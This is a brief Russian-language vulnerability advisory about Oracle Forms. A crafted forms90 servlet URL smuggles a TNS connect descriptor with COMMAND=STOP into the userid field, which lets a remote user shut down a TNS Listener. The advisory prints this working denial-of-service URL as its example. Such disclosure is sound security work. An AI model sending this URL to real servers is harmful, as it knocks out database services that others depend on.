Программа: Oracle Forms 

Уязвимость позволяет удаленному пользователю остановить процесс TNS Listener.
Если TNS Listener защищен паролем, удаленный пользователь может с помощью специально сформированного URL остановить работу процесса. 

Пример:

http://[target]:8888/forms90/f90servlet?form= test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=
(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP) (HOST=server)(PORT=1521)))(CONNECT_DATA= (COMMAND=STOP)(SERVICE=LISTENER)))&
buffer_records=NO&debug_messages=NO&array=YES & query_only=NO&quiet=NO&RENDER=YES



Оставить мнение